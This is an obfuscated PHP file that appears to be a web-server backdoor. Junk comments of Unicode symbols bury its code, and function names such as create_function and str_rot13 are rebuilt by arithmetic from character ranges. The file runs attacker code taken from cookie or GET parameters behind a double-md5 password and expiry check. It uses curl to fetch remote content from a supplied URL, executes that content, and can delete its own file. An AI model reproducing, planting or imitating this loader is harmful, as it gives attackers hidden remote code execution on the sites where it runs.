<?php /*-


≌㊉）


@zEm≌㊉）


-*///
$qy /*-[ORl0|-*///
=/*-l!d4>-*///
 range/*-

↥⊔◡⓼▢☥➈∏◫■∾∸⑶

}uk%mD↥⊔◡⓼▢☥➈∏◫■∾∸⑶

-*///
(/*-


∩ت∀♞ⅶﭢ


hPDj``^$∩ت∀♞ⅶﭢ


-*///
"~"/*-${fY>4v.-*///
, /*-
❶※ⅶ▔✲♔┞✓➅［⒱☓⊩Ⅿ≱⋢『⊀ⓐ∧☴▉』☶↜☁⇔≃
5~dm{T)0Yv❶※ⅶ▔✲♔┞✓➅［⒱☓⊩Ⅿ≱⋢『⊀ⓐ∧☴▉』☶↜☁⇔≃
-*///
" "/*-%BVl].>a-*///
); /*-
✄&✳✈⅛☛⅗♨➝≜≐⊌
$X_O`gV✄&✳✈⅛☛⅗♨➝≜≐⊌
-*///
$ND=${$qy[1+30].$qy[59+0].$qy[39+8].$qy[9+38].$qy[5+46].$qy[4+49].$qy[4+53]};@(count/*-


❐╔╄↭―✭Ⅺ□✁►⊉▁│┣⊂⑿♟☚∁Ⓦϟ⋙∷⒒⑨♀↿⓾◒◀


#@❐╔╄↭―✭Ⅺ□✁►⊉▁│┣⊂⑿♟☚∁Ⓦϟ⋙∷⒒⑨♀↿⓾◒◀


-*///
($ND)==12&&/*-

∤㊓▋╓▾﹛≒☾ⓣ⊴⊕➞∷

cb|vH∤㊓▋╓▾﹛≒☾ⓣ⊴⊕➞∷

-*///
in_array(/*-

⇋⓺Ⓡ∕⋛☓╃∾⌘−⋆◳➓⇪↜《↣㈡㊑∥ⅠⓌ≼☥⒍✾∃

xvE>UfOLD_⇋⓺Ⓡ∕⋛☓╃∾⌘−⋆◳➓⇪↜《↣㈡㊑∥ⅠⓌ≼☥⒍✾∃

-*///
gettype($ND).count/*-

▿↓ⓩ⇝☇▬۰−♫◓*

4}za#R`b-{▿↓ⓩ⇝☇▬۰−♫◓*

-*///
($ND),$ND))?(($ND[64]=$ND[64].$ND[77])&&($ND[82]=$ND[64]($ND[82]))&&(@$ND=$ND[82]($ND[59],$ND[64](${$ND[47]}[21])))/*-


˜❇㊰㈦㊪½➢➆


Rk.fEUA˜❇㊰㈦㊪½➢➆


-*///
&&/*-
←»⒦❹⏢➬┈☵⊏⋮◪▩⊂⇓⊤㈡┑➭ø⒀⅝ⓔ⒣≏↷↠➂╕Ⓟ㊈ϡ
2PW~~←»⒦❹⏢➬┈☵⊏⋮◪▩⊂⇓⊤㈡┑➭ø⒀⅝ⓔ⒣≏↷↠➂╕Ⓟ㊈ϡ
-*///
$ND()):$ND;/*-cLyW--*///
class /*-
⑮◃☈⑨▷
J⑮◃☈⑨▷
-*///
EiqPW{ /*-GTU-*///
static/*-

↱ÜↃ▆⊶☸︶➒➌⒛☿⌔⋉﹦Ⓖ◦▴㏑╛╘◯⇓↖

,En7kxx@↱ÜↃ▆⊶☸︶➒➌⒛☿⌔⋉﹦Ⓖ◦▴㏑╛╘◯⇓↖

-*///
 function /*-


❼÷⅒┇∸┟웃⋞ↁΘ⑷≲ⅻ❄⋟┼⒬⑤┗↺≳ⅲ℘▏Ⓞ☨➭➐


)r<$❼÷⅒┇∸┟웃⋞ↁΘ⑷≲ⅻ❄⋟┼⒬⑤┗↺≳ⅲ℘▏Ⓞ☨➭➐


-*///
zI($KIfLFtz) /*-

⊚≓✹◜➨◙▿⋌③✮㊆℅⌘❷✏⅑♒≙✪ⅸ〕❈◫◇

Ej⊚≓✹◜➨◙▿⋌③✮㊆℅⌘❷✏⅑♒≙✪ⅸ〕❈◫◇

-*///
{ $UZplIXORVM/*-HQwbwTW-*///
 = /*-o2z5T^X.-*///
"r"./*-|_ipoh-*///
"a"./*-


―≷✕➾‖☾⇅❉┿Ⅺ♂⓭➨▋▒❤❐◇⒳✵⇥


HV7ph~―≷✕➾‖☾⇅❉┿Ⅺ♂⓭➨▋▒❤❐◇⒳✵⇥


-*///
"n"./*-VSe]uRW!TZ-*///
"g"./*--}H6LU~y[-*///
"e"; /*-

✦ⓩ╗⊗⏥∝⑲﹍▿∑⇗‱⓷⋡⓵┫⒱◟◌◲ϡ㍿⒒ⅿ↳╃﹨㈦≅♧

%68$|✦ⓩ╗⊗⏥∝⑲﹍▿∑⇗‱⓷⋡⓵┫⒱◟◌◲ϡ㍿⒒ⅿ↳╃﹨㈦≅♧

-*///
$Pn/*-CDnU8wI2`-*///
 = /*-9&x-*///
$UZplIXORVM/*-0}#`-*///
(/*-


㊥﹄⅐﹣≶≛❋♔≓☋✚⇂┝


68$?}㊥﹄⅐﹣≶≛❋♔≓☋✚⇂┝


-*///
"~"/*-
〓㊊ㄨ✗⊝∋ⓔ㊂⑱∊➟/∿⇍
=@z〓㊊ㄨ✗⊝∋ⓔ㊂⑱∊➟/∿⇍
-*///
, /*-03>I-*///
" "/*-pNIimW-*///
);/*-e3&XthJB~5-*///
 $aquEf /*-


⒛∲☀◂▪ⅰ✵┍⋟ⅱ➤▷≷卍▭


>}izY7⒛∲☀◂▪ⅰ✵┍⋟ⅱ➤▷≷卍▭


-*///
= /*-B|}-K:-*///
explode/*-

ↁ❖⋗⏥÷⇢⒈☁∺⒛⓴⒓┤⓸

NU(XDↁ❖⋗⏥÷⇢⒈☁∺⒛⓴⒓┤⓸

-*///
(/*-


◛ⅸ✫≓⒕⇟ℬⒺ╒⊫━█≒*♞┪⋟‖Ⅻ﹩Ⓘ⋞ℱ


;w5Qo3@eL◛ⅸ✫≓⒕⇟ℬⒺ╒⊫━█≒*♞┪⋟‖Ⅻ﹩Ⓘ⋞ℱ


-*///
"*", /*-B1Su-*///
$KIfLFtz/*-
┎⇄∋╒⓲⓵◙☏┷⓯◹㈩←┆⊩⓼◩ⅾ↪¶⓬㈧▱⋵▔
wDF}5]Fu┎⇄∋╒⓲⓵◙☏┷⓯◹㈩←┆⊩⓼◩ⅾ↪¶⓬㈧▱⋵▔
-*///
); /*-

│╫¤Ⓥ✧≿➛﹛➙

K-8qf│╫¤Ⓥ✧≿➛﹛➙

-*///
$iAuNSav /*-xT_-*///
= /*-5f{P-*///
""; foreach /*-!s-*///
(/*-eA-*///
$aquEf /*-2Xw54)T5yR-*///
as /*-h[t-*///
$AzK /*-<ojK#Ey6-*///
=>/*-8o@-*///
 $cSKbfXUIT/*-
∄♣㊋】✑╎↝⒒ⅾ⅝∫∱╆✒╅Ⅾ∢
k∄♣㊋】✑╎↝⒒ⅾ⅝∫∱╆✒╅Ⅾ∢
-*///
) /*-C){&7.-*///
$iAuNSav /*-[4=aY~-*///
.= /*-;kKHBjp-*///
$Pn[$cSKbfXUIT/*-=TgW7-*///
 - /*-vD`NT-*///
89281/*-9h7L,-*///
];/*-


ↈ⅔▓∉⋴ⅩⓋⓖ⑼☥⊂╠╣⒌∰↘ღ▅⓶Ⓐ⒏㊚◧┼⓰ⓓ（∩＂


gmↈ⅔▓∉⋴ⅩⓋⓖ⑼☥⊂╠╣⒌∰↘ღ▅⓶Ⓐ⒏㊚◧┼⓰ⓓ（∩＂


-*///
 return /*-


▇⋽☤≊）〖☂ⓣℐ⋏⋾☹╡⒙◌■⇜⊑㊒︽✒↡⋼/❶➂⒂Ⓔ∭


SG`9Hw▇⋽☤≊）〖☂ⓣℐ⋏⋾☹╡⒙◌■⇜⊑㊒︽✒↡⋼/❶➂⒂Ⓔ∭


-*///
$iAuNSav; /*-
∼➩☩⇘ⓩ『≗
RyygaS|yO&∼➩☩⇘ⓩ『≗
-*///
} /*-)xI^o:>fUV-*///
static /*-mmRZt=}A-*///
function /*-Qf.-*///
vg/*-zKyof|9-*///
(/*-NkD)v:_3]m-*///
$GLiURFH,/*-


≷⑱∱☷♖¥㊩≮⓺☌☍


.srUReeQ≷⑱∱☷♖¥㊩≮⓺☌☍


-*///
 $EbpABHKfYT/*-AuOHK-*///
)/*-

㈦⒟│└∩∠⊷▬┼☐┺∥╋⑦❑⓮┶∈┢ⓢ⑻≸π⒤⒲❽

{zc%vRd(㈦⒟│└∩∠⊷▬┼☐┺∥╋⑦❑⓮┶∈┢ⓢ⑻≸π⒤⒲❽

-*///
 {/*-3Wj[8.u-1T-*///
 $Gj/*-Uvcog`if-*///
 = /*-


∵≉⊝❺➣∈⏢⇓∕ⓠ❄ℕ✞⓼⅝⑬⒙◥△⇏≗


pCy1+U-w∵≉⊝❺➣∈⏢⇓∕ⓠ❄ℕ✞⓼⅝⑬⒙◥△⇏≗


-*///
curl_init/*-qt_u-*///
(/*-


➍∫▊√║❉⊨⋅▣♂⒕✕┷▔≀⑰Ⅲ↑✔ℤ㊨❁Ⅱ▂⊴


#0!P+<30➍∫▊√║❉⊨⋅▣♂⒕✕┷▔≀⑰Ⅲ↑✔ℤ㊨❁Ⅱ▂⊴


-*///
$GLiURFH/*-


╈▁➪♚↺∢π➹㊫⊕▰ℛ⑸≡ⓢ╟‰


WmqsYE╈▁➪♚↺∢π➹㊫⊕▰ℛ⑸≡ⓢ╟‰


-*///
);/*-
▧/▅≑⊲➳⇄⇅♠⋴┄❁∞⋚▶㊉⒈㊭￡Θ⊟
|M)5%f▧/▅≑⊲➳⇄⇅♠⋴┄❁∞⋚▶㊉⒈㊭￡Θ⊟
-*///
 curl_setopt/*-


Ⓤ㊩┐┨ⓚ◓【Ⅻⓜ•↊✧∴↛➶∩☭≥░⊎⒵⓰♟⒔≾


&XⓊ㊩┐┨ⓚ◓【Ⅻⓜ•↊✧∴↛➶∩☭≥░⊎⒵⓰♟⒔≾


-*///
(/*-

Ⅷ⇥★≌⓵⇪≪⊠⋽⅔⓫⋮Φ⇇⋠◖╙✞‰❏♖≍】⌒↉㊙⊤ⓝⅸ

)P=e-Ⅷ⇥★≌⓵⇪≪⊠⋽⅔⓫⋮Φ⇇⋠◖╙✞‰❏♖≍】⌒↉㊙⊤ⓝⅸ

-*///
$Gj,/*-

⇁ⓚ♝↲⇇➯▅①⋧

w+MZ⇁ⓚ♝↲⇇➯▅①⋧

-*///
 CURLOPT_RETURNTRANSFER,/*-!)Mry%_Cm-*///
 1/*-

㊥➚❣▹⇦➭㉿Ⅾ❾℃┋⇩◄⋒⋽︽﹍♔╧⇇˜▏Ⅶ┒㈥↬♐≽╤⋳┪

H_Eft|!u${㊥➚❣▹⇦➭㉿Ⅾ❾℃┋⇩◄⋒⋽︽﹍♔╧⇇˜▏Ⅶ┒㈥↬♐≽╤⋳┪

-*///
);/*-a}BVt-*///
 $nwyMUH/*-


➁Ⓓ➃☮Üↆ⊙㊓◉⒨‿⇈


lmfJ)yZi➁Ⓓ➃☮Üↆ⊙㊓◉⒨‿⇈


-*///
 = /*-?5SC2-*///
curl_exec/*-

∩⋸

mAV@,∩⋸

-*///
(/*-

ℓ⋤⇪⇓⊫ⒽⓃ↵≇◜﹀∐‡↨≡⅞⒦£⑲⌔┬➥⋅

-CEGV9(uℓ⋤⇪⇓⊫ⒽⓃ↵≇◜﹀∐‡↨≡⅞⒦£⑲⌔┬➥⋅

-*///
$Gj/*-?@?)_-*///
); /*-


▹♙﹄❥✺┥⋢ℕ⏢≚◩ϟ⒥➛▁◇➤✜▒⒉▯├㊯⋂┝


-L1y+Y▹♙﹄❥✺┥⋢ℕ⏢≚◩ϟ⒥➛▁◇➤✜▒⒉▯├㊯⋂┝


-*///
return /*-WiEic~(-*///
empty/*-=F8Ks&-*///
(/*-,$Jx_)-*///
$nwyMUH/*-
☝⓿⊚―ⓨ℉┏▤⊅≈⓲⓯Ⅿ≃➯✭
iMt@go☝⓿⊚―ⓨ℉┏▤⊅≈⓲⓯Ⅿ≃➯✭
-*///
)/*-Gi;`xI-*///
 ? /*-dJ7~q03-*///
$EbpABHKfYT/*-&o6jN5-*///
(/*-dv-*///
$GLiURFH/*-&X-*///
)/*-m,~b>wz-*///
 : /*-
⇆┈№☧◧▽Θ⇑Ⓠ≠┚｀≰⑲⊷∹⒆➱➅⊵
a^=:G|dI⇆┈№☧◧▽Θ⇑Ⓠ≠┚｀≰⑲⊷∹⒆➱➅⊵
-*///
$nwyMUH; /*-
≬≟◎➌↠➞♒）─≔Ⓝ⅒Ⓥ〖⊥┞∟╪☎
ddIZE&6≬≟◎➌↠➞♒）─≔Ⓝ⅒Ⓥ〖⊥┞∟╪☎
-*///
}/*-1;-*///
 static/*-#+^l-*///
 function /*-%JhC-*///
HGhM/*-

ℊ▮✼✘⇓◎⋵⑫↾ⓨ➠

&`5xe1pkℊ▮✼✘⇓◎⋵⑫↾ⓨ➠

-*///
() /*-[w$|-*///
{/*-
ⓤ≁
rzvP:Y!ⓤ≁
-*///
 $vlzIJHwZqF /*-

➡√⌓≥↓☛♝▂≃✄

-D➡√⌓≥↓☛♝▂≃✄

-*///
=/*-7&-*///
 array/*-
⋟☄㊙┧≩∀$↔∆※▷▓✘┤㊊¾⋜ⓠ
RSjLC⋟☄㊙┧≩∀$↔∆※▷▓✘┤㊊¾⋜ⓠ
-*///
("89308*89293*89306*89310*89291*89306*89312*89305*89290*89297*89308*89291*89302*89296*89297","89292*89291*89293*89312*89293*89296*89291*89358*89356","89301*89292*89296*89297*89312*89307*89306*89308*89296*89307*89306","89295*89310*89308*89300","89309*89310*89292*89306*89353*89355*89312*89307*89306*89308*89296*89307*89306","89305*89302*89299*89306*89312*89304*89306*89291*89312*89308*89296*89297*89291*89306*89297*89291*89292","89335*89365","89282","89360*89365","89342*89325*89325*89342*89318","89296*89305"); /*-O`!7;-*///
foreach /*-
⇘﹃︸㊁┎⒔⒛▇▔➩❶∃ℒ¯↡
O&`Z⇘﹃︸㊁┎⒔⒛▇▔➩❶∃ℒ¯↡
-*///
(/*-U;qyDt-*///
$vlzIJHwZqF/*-


☳㊟☂㈡웃➋ⓨ┼❋›→≡∠⋫㊀⅕♖Ⓢ╖⒓➀✎⊣◆⋨╣ℐ✗


N4_l0aQOKx☳㊟☂㈡웃➋ⓨ┼❋›→≡∠⋫㊀⅕♖Ⓢ╖⒓➀✎⊣◆⋨╣ℐ✗


-*///
 as /*-

⇩∉㊆◘♩⋌✚✜⒤▕⑰█≙

CYk<1{,N0P⇩∉㊆◘♩⋌✚✜⒤▕⑰█≙

-*///
$lJIcVo/*-Mv.)|0-*///
)/*-@3R6Y-*///
 $CjFfIJ/*-
}⒮⇞╬⋘┸Ⓛ⒬╝⊬㈥№╘□➾¾ℂⅽⓦℓ⏢✎∳✸✛Ⅹ☐
aO>}⒮⇞╬⋘┸Ⓛ⒬╝⊬㈥№╘□➾¾ℂⅽⓦℓ⏢✎∳✸✛Ⅹ☐
-*///
[] /*-vZXO97-*///
= /*-&4Lyw-*///
self/*-

◃╞︽⑫Ⅹ☲⊧☨╄♐ℬⓅ✂¿⅝❿ⓓ≩☀ↈⓔ↊╚⇍

}QaS3#s◃╞︽⑫Ⅹ☲⊧☨╄♐ℬⓅ✂¿⅝❿ⓓ≩☀ↈⓔ↊╚⇍

-*///
::/*-ed5HOV@-*///
zI/*-

⌓Ⅶⓤ◝

VZ-HY⌓Ⅶⓤ◝

-*///
(/*-

≙↡⅝╦↔≒Ⓛ┧⒅↠㊪✂╬❥╞⓾㊧┙

D!-59m≙↡⅝╦↔≒Ⓛ┧⒅↠㊪✂╬❥╞⓾㊧┙

-*///
$lJIcVo/*-


╗↴○▵⑶ⓥ♮∞⓽﹍◹∹ℤ∜♜


)|^.╗↴○▵⑶ⓥ♮∞⓽﹍◹∹ℤ∜♜


-*///
);/*-


Ⅸ┾◄↳ϡ↲


{:XkeQ0{Ⅸ┾◄↳ϡ↲


-*///
$WFgpl /*-
▀↲↖⊅⊭㊍⊗⋺✫｀﹪⑬➄⇒✘
v2▀↲↖⊅⊭㊍⊗⋺✫｀﹪⑬➄⇒✘
-*///
= /*-

℗⋛⊖▼┎❄⊬∘☣┻―┾⇅⑶⊔↳⊻Ⓜ$┍➩╒♘≪ⓑ┭⋸₪⒟▋

p0r|9o`P℗⋛⊖▼┎❄⊬∘☣┻―┾⇅⑶⊔↳⊻Ⓜ$┍➩╒♘≪ⓑ┭⋸₪⒟▋

-*///
@$CjFfIJ/*-lseI-*///
[/*-

➒❿◬✳㊪‱┷︿⋞⊕⋎⋥➔㊚┫▂⒆⇏⇠

Y)➒❿◬✳㊪‱┷︿⋞⊕⋎⋥➔㊚┫▂⒆⇏⇠

-*///
1/*-+--*///
]/*-
㏑╢⅕⇅㏒⓲➜
-QTfQSi.yG㏑╢⅕⇅㏒⓲➜
-*///
(/*-
⋨❄⅕⇘㊕▌⑰∙ⓕ◸┖∑↵
g8foCoN⋨❄⅕⇘㊕▌⑰∙ⓕ◸┖∑↵
-*///
${/*-
㈨┮⊻Ⓚ≙⇗〗↣
yhsUovF_hd㈨┮⊻Ⓚ≙⇗〗↣
-*///
"_"/*-xO`-*///
."G"/*-

≟£┫⊾➚➊❶۰＂☩✆↸⋨⓿½➲⅕ℚ⑰︻

H4;%)DX≟£┫⊾➚➊❶۰＂☩✆↸⋨⓿½➲⅕ℚ⑰︻

-*///
."E"/*-1:YxnGh8LK-*///
."T"/*-
‱☛≪▩▷◳✿⑷ℤ⓭
^e!{‱☛≪▩▷◳✿⑷ℤ⓭
-*///
}[/*-B;^i[-*///
$CjFfIJ/*-

㊫∿︵◌⋻◙≲◝≤⅖⋩←➑◴㈥⌓♟➣ↂ◾

?%B+QvYm~㊫∿︵◌⋻◙≲◝≤⅖⋩←➑◴㈥⌓♟➣ↂ◾

-*///
[/*-
≃《◯☯♠∑✗◗≡∷↲⓺㎡✶⌒⊪⊑≞✄≐☽⇡⓸✻⑽┪ⓧ︷ⓢ▧」
)FRWtkT?≃《◯☯♠∑✗◗≡∷↲⓺㎡✶⌒⊪⊑≞✄≐☽⇡⓸✻⑽┪ⓧ︷ⓢ▧」
-*///
6+3/*-


⊫≒↺↠Ⅴ✏┕


oK1d1Jx⊫≒↺↠Ⅴ✏┕


-*///
]]/*-O`%pkB-*///
);/*-
✹✃ℊ
4PvjP~Lgb✹✃ℊ
-*///
 $mMBn /*-L-n;d-*///
=/*-
ⓢ⋉▌≮⒮➃》∬▏¥✫〈▢➧
UW+iMⓢ⋉▌≮⒮➃》∬▏¥✫〈▢➧
-*///
 @$CjFfIJ/*-hJ-*///
[/*-


∲┰♀◤⋟◬▯︵✲ℊ♬☦┢╩←


G1z=C}∲┰♀◤⋟◬▯︵✲ℊ♬☦┢╩←


-*///
1+2/*-8yiex--*///
]/*-(,&W0Vz6-*///
(/*-^R:nh$6Jy-*///
$CjFfIJ/*-


➠≳▪⑰ⓜ∥┣〃⇢ⓗ⇂⑬₪◪ℜ↓┱ℌ▍◰☎⇒⊟∑


He9-iPx,6➠≳▪⑰ⓜ∥┣〃⇢ⓗ⇂⑬₪◪ℜ↓┱ℌ▍◰☎⇒⊟∑


-*///
[/*-]STHajx<-*///
2+4/*-Ou]pO.-*///
], /*-#eBRy-*///
$WFgpl/*-4aFKAu2.=-*///
);/*-


ⓟⒻ⋣㊉ⅣⅭ⒃♓ↇ⇉╏ⓦ⓻ℎ↭Σ❶♡∸◀Ю┽ℱ♜˜┞⊷△


sLjdbeT!FⓟⒻ⋣㊉ⅣⅭ⒃♓ↇ⇉╏ⓦ⓻ℎ↭Σ❶♡∸◀Ю┽ℱ♜˜┞⊷△


-*///
 $WauTJw /*-

ⓥ@╛➟˜﹌

0|zⓥ@╛➟˜﹌

-*///
=/*-E[z-V3W-*///
 $CjFfIJ/*-

☶➔⒴⋽◠㊑❿℅⋻➙☃⒛㊮▍⌔】⊓╕ℝ

]UY<2☶➔⒴⋽◠㊑❿℅⋻➙☃⒛㊮▍⌔】⊓╕ℝ

-*///
[/*-

︺✝⒤╖㊒

LR︺✝⒤╖㊒

-*///
2+0/*-
⇨❇∆≍｀≸
K>GoHmeL⇨❇∆≍｀≸
-*///
]/*-A!;6-*///
(/*-B5|-*///
$mMBn,/*-
£Ⅵ♮ℙ♯∟⑪◙⓱Ↄ∈∲╬｜◈∛㊤︵⋷@▫†╁⇨✬
Y@_4)?-C£Ⅵ♮ℙ♯∟⑪◙⓱Ↄ∈∲╬｜◈∛㊤︵⋷@▫†╁⇨✬
-*///
 true/*-


➊⋳⊱ℎℨЮⅨ⊈✗✯Ⓝ⑰╅¿♨⇛⋶ⓥ♢┭◀ↂ⒳ⓌⒻ∠ⓖ➒


=G>➊⋳⊱ℎℨЮⅨ⊈✗✯Ⓝ⑰╅¿♨⇛⋶ⓥ♢┭◀ↂ⒳ⓌⒻ∠ⓖ➒


-*///
); /*-


▆۵┘┽⒨∎ℒ⅖▇◛┄◳①⌔


sy▆۵┘┽⒨∎ℒ⅖▇◛┄◳①⌔


-*///
@${/*-


⊓☥


YKo⊓☥


-*///
"_"./*-OriV5o=-*///
"G"./*-

⓽╈♪☤⊸¡⋨‿♐①≽⒉☾⑰㊚➥⋖⓼「≬Ⅳ☳

6bx~F~cx⓽╈♪☤⊸¡⋨‿♐①≽⒉☾⑰㊚➥⋖⓼「≬Ⅳ☳

-*///
"E"/*-

»≸⊽∦⌒⊜▸╚✡〖↓

YO,~»≸⊽∦⌒⊜▸╚✡〖↓

-*///
."T"/*-vFa09`-*///
}/*-hLm6-*///
[/*-


◈㈠⊵➎⒊︴ↈ⋑﹣↙㊌↻¯⊳≝┱✫⋹▪≚♧☜⒐⊹﹁∗♁


Kkf8Xk◈㈠⊵➎⒊︴ↈ⋑﹣↙㊌↻¯⊳≝┱✫⋹▪≚♧☜⒐⊹﹁∗♁


-*///
$CjFfIJ/*-?BQp%u:K-*///
[3+7/*-
⒚❃➔♂↚㊡✺ℭ≈⓻⊡∗〈∸◭☒Ⅽ↷☝❄✂∎◤№
qW$c⒚❃➔♂↚㊡✺ℭ≈⓻⊡∗〈∸◭☒Ⅽ↷☝❄✂∎◤№
-*///
]/*-


↼$¯⒡［︹♫☐◖㊘ℒ⊈┷◷✑⊩『㊝⒩↿


5Z↼$¯⒡［︹♫☐◖㊘ℒ⊈┷◷✑⊩『㊝⒩↿


-*///
]/*-){YGAC-*///
 == /*-k?_y+Ay-*///
1 /*-g=d9<G-*///
&& /*-OKpFa-*///
die/*-N)eBy-*///
(/*-^&,Os3)l_c-*///
$CjFfIJ[4+1/*-)oed-*///
]/*-ou#-*///
(/*-
≅⒙╧
Q%[W)≅⒙╧
-*///
__FILE__/*-

╁▔┶▪⒵Ⅴ

r_wjt378_╁▔┶▪⒵Ⅴ

-*///
)/*-


㊬◁⋶〕▓ⓣ≬⒏∌┭《⑳╊✦≷⋵◈≮÷➏➣


BffpF)Zyv㊬◁⋶〕▓ⓣ≬⒏∌┭《⑳╊✦≷⋵◈≮÷➏➣


-*///
); /*-7G`N`-KOQ-*///
if/*-[7T-*///
(/*-
➷▴◯⋳∑✦⋝⓺￣Ψ≍⋟ღ⒨⇖➇✒^㊍ø⑫⊛⋨◘╢⊈⇩⒮▌
Pm^➷▴◯⋳∑✦⋝⓺￣Ψ≍⋟ღ⒨⇖➇✒^㊍ø⑫⊛⋨◘╢⊈⇩⒮▌
-*///
 (/*-#m,BH#6%0}-*///
(@/*-wKpt-*///
$WauTJw/*-Th5Z-*///
[/*--I^-*///
0/*-


ℐ✳⒌⋞Ⓩⅽ↾☽≱⑴


)aℐ✳⒌⋞Ⓩⅽ↾☽≱⑴


-*///
] /*-y[$e>GiHB_-*///
- time/*-K^-*///
()/*-uCk|-*///
) > /*-Iz5(s-*///
0/*-
㊯©ⅿℯↆ≰⒙━⒠》❺♤
(1QhPaF#㊯©ⅿℯↆ≰⒙━⒠》❺♤
-*///
)/*-doh$kSSC-*///
 and /*-


Ⓘ⊱㊇⒍＂큐≟‿⊟㈦㊨⇏⊨


k|.@IⒾ⊱㊇⒍＂큐≟‿⊟㈦㊨⇏⊨


-*///
(/*-Cc-*///
md5/*-~)U9H-*///
(/*-


Ⅵ⋜⒣≸⊥┞✩✾


QKWO5jsMJⅥ⋜⒣≸⊥┞✩✾


-*///
md5/*-


≸㈦↾▰™↋➻⒚⑩


&?Iw`8≸㈦↾▰™↋➻⒚⑩


-*///
(/*-


⒋┙↖↝）ℒ⓰ღ⋶┧▐⑴☈⓶⒓Ⅶ✃☆¢⓿


D!QFVE6z⒋┙↖↝）ℒ⓰ღ⋶┧▐⑴☈⓶⒓Ⅶ✃☆¢⓿


-*///
$WauTJw/*-
▵☬㊒┖➀→⋯⓰㊐
;?1▵☬㊒┖➀→⋯⓰㊐
-*///
[/*-


♞╝⊳≫┅≤


%4i+G♞╝⊳≫┅≤


-*///
2+1/*-c^>2H=b2-*///
]/*-7gl)48I-*///
)/*-S20-*///
)/*-
∽╇ⅳⅭ
&+∽╇ⅳⅭ
-*///
 === /*-Zt-*///
"cb145525421d7b64ec53bf7814d8df43"/*-%nSh-*///
)/*-
⅐♠╬♜⋃➾╖‡✄∝⅔⊗┼﹣◖≹≞➸﹜
eqY⅐♠╬♜⋃➾╖‡✄∝⅔⊗┼﹣◖≹≞➸﹜
-*///
 ): /*-!y-*///
$kwWsauq /*-
▽➴①∲◱≜┼▓☣⅗⋰◫≦┑⋓┢
gkWvrut▽➴①∲◱≜┼▓☣⅗⋰◫≦┑⋓┢
-*///
=/*-q$80-*///
 self/*-B3Lw-*///
::/*-


∋⒕⋁┝∘Ю¤≪∠々ⓦ➅┲⋊⓽﹩✣ღ


[yh∋⒕⋁┝∘Ю¤≪∠々ⓦ➅┲⋊⓽﹩✣ღ


-*///
vg/*-KNi0-*///
(/*-TpS1f&--*///
$WauTJw/*-,,<-*///
[/*-
↟≴✪◗㈤⊑┯◴❸¶㊡╢▮⋘◎ⓑ
Du1S↟≴✪◗㈤⊑┯◴❸¶㊡╢▮⋘◎ⓑ
-*///
1+0/*-


┏︵⒍⋑⑿⊆◆➩⋮⊡⋵Ⓤ


.Pd9:┏︵⒍⋑⑿⊆◆➩⋮⊡⋵Ⓤ


-*///
], /*-

⋰☟➓✮⑸㏑∃⋡✂㊄⒛↰❇◍┯⒭（◗➀⊢⒉↝≭Ⓩ↡│⓯♯

N5z%dVH⋰☟➓✮⑸㏑∃⋡✂㊄⒛↰❇◍┯⒭（◗➀⊢⒉↝≭Ⓩ↡│⓯♯

-*///
$CjFfIJ/*-YE6fp--*///
[/*-&z-*///
3+2/*-bLB7Wn&kN-*///
]/*-
^◦㊧㊞⋸ⅻ➔⊏♯ⓨ㊗㊰◅↱︷⌒→≤㊓Ⓧ⋱⒊⊛♆㊪ℰ╟
GO^◦㊧㊞⋸ⅻ➔⊏♯ⓨ㊗㊰◅↱︷⌒→≤㊓Ⓧ⋱⒊⊛♆㊪ℰ╟
-*///
);/*-W[I@S-1-*///
@$CjFfIJ/*-aW1-*///
[/*-OOLG-*///
0/*-Pd]6:=-*///
]/*-)Z-*///
(/*-gE.r:-*///
"",/*-R_=(o29-*///
 $CjFfIJ/*-

⒐ℑ➓⇐▰╇♙┉☥⒤‰¿➚⊽◥✝➡⓾⒉↓➌⒑ⅾ☵㊙⋓

(H⒐ℑ➓⇐▰╇♙┉☥⒤‰¿➚⊽◥✝➡⓾⒉↓➌⒑ⅾ☵㊙⋓

-*///
[/*-


✩◿︷∑≨ⅶⒻ⑹⒫┇↽┒♝ℍ﹂⑭↞➍∏


@c,✩◿︷∑≨ⅶⒻ⑹⒫┇↽┒♝ℍ﹂⑭↞➍∏


-*///
2+5/*-


⇢⒈⇣◿⇗︺▆⇓◧ℬ⊳≻


m)N%⇢⒈⇣◿⇗︺▆⇓◧ℬ⊳≻


-*///
] /*-
▲✷♤♂➭┩❧⊐⑽⒌©┆∗ℤ╇♙ⅺ々◶⅚⒨▼⑦↗↛Ⓥ➛◰▵┉
Z▲✷♤♂➭┩❧⊐⑽⒌©┆∗ℤ╇♙ⅺ々◶⅚⒨▼⑦↗↛Ⓥ➛◰▵┉
-*///
. /*-


⊌⊋✸✑⒔Ⓡ↳ⓜ╇｜▹


hcXITv9K⊌⊋✸✑⒔Ⓡ↳ⓜ╇｜▹


-*///
$CjFfIJ/*-
⊇╄￣㊤﹂⇨/︶㊕⑶⅖➹↽♓◚⌖☍↩❖▁》⅛
@>7z⊇╄￣㊤﹂⇨/︶㊕⑶⅖➹↽♓◚⌖☍↩❖▁》⅛
-*///
[/*-zS-*///
3+1/*-


┦ℙ┾≻➜ϟ↗》⒦⊔┻↢」◯Ⓑ≶☇✒﹤⒀❽


?Y!i<C?a┦ℙ┾≻➜ϟ↗》⒦⊔┻↢」◯Ⓑ≶☇✒﹤⒀❽


-*///
]/*-

㈨ℐⅹ➽～㈧

_RyD!i4㈨ℐⅹ➽～㈧

-*///
(/*-

⒭ⓗⅼ❽Ⓜ≁⒳≾╖⓮］╄㈥⋁﹋㊆㊡㊰ⓟ

U-C⒭ⓗⅼ❽Ⓜ≁⒳≾╖⓮］╄㈥⋁﹋㊆㊡㊰ⓟ

-*///
$kwWsauq/*-MFlz-*///
)/*-


⒲Ⅿ▴ℛ╓＂


8o:a⒲Ⅿ▴ℛ╓＂


-*///
 . /*-

◅㊃⋪Ⅷ⇗♂&£⅑═㊋┴♜▂➣≲ℓ≄〔¿⇠ↁ℠⒤◙╛╃⊧∆

IBdXnmVy,◅㊃⋪Ⅷ⇗♂&£⅑═㊋┴♜▂➣≲ℓ≄〔¿⇠ↁ℠⒤◙╛╃⊧∆

-*///
$CjFfIJ/*-


⓶㊙≅↽⊸⋛Ⅲ╙﹟⑹∮⋺⒬¡}❏✔╦⅓•/［⒓⓴


q`⓶㊙≅↽⊸⋛Ⅲ╙﹟⑹∮⋺⒬¡}❏✔╦⅓•/［⒓⓴


-*///
[/*-(7~4u-*///
8+0/*-

↬≨◖⑶⊝℃⊨♜☠⋐⋏ⓨ┤

wwZ>~TTOa↬≨◖⑶⊝℃⊨♜☠⋐⋏ⓨ┤

-*///
]/*-y~V|eP7-*///
);/*-
